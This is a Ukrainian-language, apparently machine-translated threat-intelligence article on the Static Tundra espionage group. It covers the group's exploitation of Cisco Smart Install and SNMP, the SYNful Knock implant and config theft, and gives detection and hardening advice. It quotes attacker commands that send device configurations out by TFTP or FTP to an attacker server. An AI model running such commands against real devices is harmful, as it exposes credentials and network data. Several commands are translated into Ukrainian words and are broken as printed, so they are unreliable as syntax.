21.02.2024
1 хв
1227
Стаття розкриває механіку атак угруповання Static Tundra — як зловмисники використовують відомі вразливості та незахищені, end-of-life пристрої, щоб отримати прихований і довготривалий доступ до мереж. Читачі дізнаються про основні вектори проникнення, типові ознаки компрометації в логах і трафіку, а також про інструменти, які застосовують атакуючі для викрадення конфігурацій і перехоплення трафіку.
Static Tundra вважають російським державним кібершпигунським угрупованням, яке зосереджується на зламі мережевого обладнання, щоб тривалий час непомітно проникати в системи та отримувати доступ до структур, важливих для інтересів російської влади. Static Tundra, ймовірно, є підкластером іншої групи, « Energetic Bear » (також відомої як BERSERK BEAR), виходячи зі спільних тактик, методів і процедур (TTP) та віктимології, що було підтверджено ФБР. Energetic Bear була пов’язана з підрозділом Центру 16 Федеральної служби безпеки Росії (ФСБ) у обвинувальному акті Міністерства юстиції США 2022 року . Є підстави вважати, що Static Tundra пов’язана з історичним використанням «SYNful Knock» – шкідливого імплантату, встановленого на скомпрометованих пристроях Cisco, про що публічно повідомлено у 2015 році.
Групу Static Tundra оцінюють як висококваліфіковану кібергрупу, яка працює понад десять років та проводить довгострокові шпигунські операції. Static Tundra спеціалізується на мережевих вторгненнях, що підтверджується глибокими знаннями групи про мережеві пристрої та використанням спеціалізованих інструментів, можливо, включаючи новий, але вже десятирічний, імплантат маршрутизатора SYNful Knock.
Static Tundra атакує непатчені та часто відпрацьовані мережеві пристрої, щоб встановити доступ до основних цілей та підтримувати вторинні операції проти пов’язаних цілей, що становлять інтерес. Після встановлення початкового доступу до мережевого пристрою Static Tundra глибше проникає в цільове середовище, компрометуючи додаткові мережеві пристрої та створюючи канали для довгострокової безпеки та збору інформації. Це демонструється здатністю групи підтримувати доступ до цільових середовищ протягом кількох років, не будучи виявленою.
Роками Static Tundra компрометувала пристрої Cisco, використовуючи раніше виявлену вразливість у функції Smart Install програмного забезпечення Cisco IOS та Cisco IOS XE (CVE-2018-0171), яка залишалася невиправленою, часто після того, як ці пристрої вийшли з ладу. Мета цієї кампанії — масове витягування конфігураційних даних пристроїв, які потім за потреби використовуватимуться у відповідності до стратегічних цілей і інтересів російського уряду. Це підтверджується адаптацією дій Static Tundra та зміною їх операційного фокусу відповідно до еволюції пріоритетів.
З моменту першого виявлення Static Tundra у 2015 році група атакувала організації у сфері телекомунікацій, вищої освіти та виробництва. Жертви переважно знаходяться в Україні та країнах-союзниках, але також включають інші організації з усього світу. Імовірно, Static Tundra й надалі проводитиме операції проти мереж організацій, що мають стратегічне значення для російських інтересів — зокрема у сферах виробництва та вищої освіти. Політичною мішенню, як і раніше, залишатиметься Україна та країни, що її підтримують.
Спостерігалося, що Static Tundra в першу чергу націлювалася на організації в секторах телекомунікацій, вищої освіти та виробництва, змінюючись з часом відповідно до змін у стратегічних інтересах Росії. Відомі жертви охоплюють кілька географічних регіонів, включаючи Північну Америку, Азію, Африку та Європу.
З початком повномасштабної війни проти України активність Static Tundra різко зросла — угруповання посилило операції проти українських структур і зберігає високий рівень атак донині. Якщо раніше спостерігалася більш вибіркова та обмежена активність, то зараз фіксуються компрометації організацій із різних секторів, що свідчить про суттєве розширення цілей.
Двома ключовими операційними цілями Static Tundra є: по-перше — компрометація мережевих пристроїв для вилучення конфіденційних конфігурацій, що можуть використовуватися для підготовки майбутніх операцій; по-друге — встановлення постійного прихованого доступу до мереж для довгострокового шпигунства, узгодженого зі стратегічними інтересами Росії. Через широку присутність Cisco-інфраструктури акцент робиться на експлуатації таких пристроїв та на застосуванні спеціальних інструментів, орієнтованих на збереження і непомітність на застарілих або неоновлених периферійних пристроях.
Принаймні з 2021 року спостерігається агресивне використання Static Tundra вразливості CVE-2018-0171, відомої та виправленої вразливості в програмному забезпеченні Cisco IOS та Cisco IOS XE, яка може дозволити неавтентифікованому віддаленому зловмиснику перезавантажити уражений пристрій, що призведе до відмови в обслуговуванні (DoS), або виконати довільний код на ураженому пристрої.
Компанія Cisco випустила патч для CVE-2018-0171 у 2018 році. Як раніше повідомляла Cisco, клієнтам наполегливо рекомендується негайно встановити патч, враховуючи активне та постійне використання цієї вразливості складними державними групами активних постійних загроз (APT). Пристрої, термін служби яких закінчився та не можуть підтримувати патч, потребують додаткових заходів безпеки, як зазначено в рекомендаціях щодо безпеки за 2018 рік. Непатчені пристрої з увімкненою Smart Install залишатимуться вразливими до цих та інших атак, доки клієнти не вживуть заходів .
Імовірно, Static Tundra застосовує спеціально розроблені інструменти для автоматизації експлуатації CVE-2018-0171 і подальшого викачування конфігурацій з попередньо відібраного набору цільових IP-адрес, швидше за все зібраних через публічні сервіси сканування (наприклад Shodan чи Censys). Процес подібний до тих, про які публічно повідомлялося в блогах про червоні команди та подібних публікаціях.
Після отримання початкового доступу через використання вразливості Smart Install, ланцюжок атак CVE-2018-0171 від Static Tundra продовжується видачею команди, яка змінює запущену конфігурацію та вмикає локальний сервер Trivial File Transfer Protocol (TFTP):
tftp-сервер nvram:startup-config
Це дозволяє Static Tundra встановити подальше підключення до щойно створеного TFTP-сервера для отримання конфігурації запуску. Витягнута конфігурація може розкрити облікові дані та/або рядки спільноти SNMP (Simple Network Management Protocol), які потім можна використовувати для більш прямого доступу до системи.
Також було помічено, що Static Tundra отримує початковий доступ до пристроїв через SNMP, використовуючи рядок спільноти, який був або скомпрометований під час попередньої атаки, або вгаданий. У деяких випадках група використовувала незахищені рядки спільноти “анонімний” та “публічний” з правами на читання та запис.
Отримавши початковий доступ до цільового середовища, Static Tundra взаємодіє зі службою SNMP, використовуючи рядки спільноти, які були скомпрометовані під час початкової фази доступу. У деяких випадках Static Tundra підробляє адресу джерела SNMP-трафіку. Цей метод дозволяє зловмиснику обфускувати свою інфраструктуру та обійти списки контролю доступу (ACL), оскільки протокол SNMP не використовує встановлення сеансу. SNMP пропонує різноманітні варіанти подальшого виконання на скомпрометованому пристрої, такі як виконання команд безпосередньо, зміна запущеної конфігурації та вилучення поточної запущеної конфігурації або конфігурації запуску.
Static Tundra використовує SNMP для надсилання інструкцій щодо завантаження текстового файлу з віддаленого сервера та додавання його до запущеної конфігурації. Це може забезпечити додаткові засоби доступу через щойно створені локальні облікові записи користувачів у поєднанні з увімкненням віддалених служб, включаючи TELNET.
Через відносно статичну природу мережевих середовищ, Static Tundra часто покладається на скомпрометовані рядки спільноти SNMP та облікові дані для підтримки доступу до систем протягом кількох років. У деяких випадках Static Tundra створює привілейовані локальні облікові записи користувачів та/або додаткові рядки спільноти SNMP для читання та запису.
Було помічено, що Static Tundra використовує імплантат прошивки Cisco IOS, відомий як SYNful Knock, для отримання постійного доступу до скомпрометованих систем. SYNful Knock – це модульний імплантат, який зловмисники впроваджують в образ Cisco IOS, а потім завантажують на скомпрометований пристрій. Це забезпечує прихований спосіб доступу, який зберігатиметься навіть після перезавантаження. Віддалений доступ до пристрою можна отримати, надіславши спеціально створений TCP SYN-пакет, який зазвичай називають «магічним пакетом». Додаткову інформацію, включаючи повний технічний опис, можна знайти в блозі 2015 року , опублікованому Mandiant, з додатковими деталями з блогу Cisco 2015 року .
Було помічено, що Static Tundra змінює конфігурацію TACACS+ на скомпрометованих пристроях, перешкоджаючи можливостям віддаленого ведення журналу. Static Tundra також змінює списки контролю доступу (ACL), щоб дозволити доступ з певних IP-адрес або діапазонів, що знаходяться під їхнім контролем.
Static Tundra, ймовірно, використовує загальнодоступні дані сканування з таких сервісів, як Shodan або Censys, для ідентифікації систем, що цікавлять. Потрапивши в цільове середовище, Static Tundra значною мірою покладається на власні команди, такі як «показати cdp neighbors», щоб виявити додаткові системи, що цікавлять, у цільовому середовищі. Це пропонує відносно прихований спосіб ідентифікації додаткових цілей без необхідності активного сканування.
Однією з основних дій Static Tundra щодо цілей є захоплення мережевого трафіку, який може бути цінним з точки зору розвідки. Для досягнення цієї мети Static Tundra встановлює тунелі Generic Routing Encapsulation (GRE), які перенаправляють трафік, що цікавить, до контрольованої зловмисником інфраструктури, яку потім можна захопити та додатково проаналізувати. Також було помічено, що Static Tundra збирає та витягує дані NetFlow на скомпрометованих системах, розкриваючи інформацію про джерело та місце призначення потоків, що можуть становити інтерес.
Static Tundra витягує інформацію про конфігурацію різними способами, включаючи вхідні TFTP-з’єднання через процедуру експлуатації Smart Install, згадану в розділі «Початковий доступ», вихідні TFTP- або FTP-з’єднання зі скомпрометованого пристрою до інфраструктури, контрольованої зловмисником, та вхідні SNMP-з’єднання за допомогою процесу копіювання конфігурації.
Static Tundra використовує спеціальні інструменти SNMP та функціональність, що надаються CISCO-CONFIG-COPY-MIB, для вилучення конфігурацій зі скомпрометованих пристроїв через TFTP або протокол віддаленого копіювання (RCP).
Було помічено статичну тундру, яка використовує такі команди для вилучення файлів конфігурації через TFTP та FTP:
показати конфігурацію запуску | перенаправити tftp://:/conf_bckp скопіювати running-config ftp://користувач:пароль@/output.txt
Рекомендується впровадити набір заходів для виявлення підозрілої активності, яка може свідчити про причетність пристроїв до цієї кампанії:
Здійснювати комплексне управління конфігурацією (включаючи аудит) відповідно до найкращих практик.
Проводити комплексний моніторинг автентифікації, авторизації та видачі команд.
Слідкуйте за журналами системного журналу та журналами AAA на наявність незвичайної активності, зокрема зменшення кількості звичайних подій журналювання або прогалин у зареєстрованій активності.
Слідкуйте за своїм середовищем на наявність незвичайних змін у поведінці або конфігурації.
Профілювання (відбитки пальців через NetFlow та сканування портів) мережевих пристроїв для зміни поверхневого вигляду, включаючи відкриття/закриття нових портів та трафік вхідного/відхідного (не проходження).
Де можливо, розробіть засоби видимості NetFlow для виявлення незвичайних об’ємних змін.
Шукайте непорожні або надзвичайно великі файли .bash_history.
Додаткову ідентифікацію та виявлення можна виконати за допомогою судово-медичних посібників Cisco.
Наведені нижче наполегливі рекомендації стосуються суб’єктів господарювання в усіх секторах.
Встановіть патч для CVE-2018-0171. Вимкніть Smart Install, як зазначено в рекомендаціях, якщо встановлення виправлень неможливе.
Використовуйте посібники Cisco Hardening Guides під час налаштування пристроїв.
Вимкніть telnet і переконайтеся, що він недоступний на жодній із ліній віртуального телетайпу (VTY) на пристроях Cisco, налаштувавши всі розділи VTY з параметрами «transport input ssh» та «transport output none».
Вимкніть службу Cisco Smart Install за допомогою параметра «no vstack» для будь-якого пристрою, на якому застосування доступного патчу для CVE 2018-0171 є неможливим, та розробіть плани управління завершенням терміну служби для технологій, які занадто застаріли для встановлення патчів.
Використовуйте паролі типу 8 для налаштування локальних облікових даних.
Використовуйте тип 6 для конфігурації ключів TACACS+.
Суворо дотримуйтесь найкращих практик безпеки, включаючи оновлення, контроль доступу, навчання користувачів та сегментацію мережі.
Будьте в курсі рекомендацій щодо безпеки від уряду США та галузі та розгляньте запропоновані зміни конфігурації для зменшення описаних проблем.
Оновлюйте пристрої якомога агресивніше. Це включає оновлення поточного обладнання та програмного забезпечення для виявлення відомих вразливостей та заміну обладнання та програмного забезпечення, термін служби яких закінчився. Вибирайте складні паролі та рядки спільноти й уникайте облікових даних за замовчуванням.
Використовуйте багатофакторну автентифікацію (MFA).
Шифруйте весь трафік моніторингу та конфігурації (наприклад, SNMPv3, HTTPS, SSH, NETCONF, RESTCONF).
Заблокуйте та ретельно контролюйте системи облікових даних, такі як TACACS+ та будь-які хости переходів.
Використовуйте AAA для заборони змін конфігурації ключових захистів пристроїв (наприклад, локальних облікових записів, TACACS+, RADIUS).
Запобігання та моніторинг витоків адміністративних або незвичайних інтерфейсів (наприклад, SNMP, SSH, HTTP, HTTPS).
Вимкніть усі незашифровані можливості веб-керування.
Перевірте існування та правильність списків контролю доступу для всіх протоколів управління (наприклад, SNMP, SSH, Netconf тощо).
Централізовано зберігайте конфігурації та надсилайте їх на пристрої. НЕ дозволяйте пристроям бути надійним джерелом достовірної інформації про свої конфігурації.
У статті детально розглянуто тривалу кібершпигунську кампанію, пов’язану з групою, відомою як Static Tundra, яка спеціалізується на компрометації мережевого обладнання (зокрема пристроїв Cisco) з метою тривалого прихованого доступу й збору конфігураційних та мережевих даних. Описано ключові тактики та інструменти угруповання — експлуатацію вразливості Smart Install (CVE-2018-0171), використання SNMP та TFTP для витягання конфігурацій, впровадження постійних механізмів доступу (включно з імплантатом SYNful Knock) та методи приховування слідів через зміну ACL і налаштувань журналювання. Також проаналізовано віктимологію атак (переважно телеком, освіта, виробництво, фокус на Україні та її партнерах), а наприкінці надані практичні рекомендації з виявлення, запобігання та відновлення безпеки мережевих пристроїв.
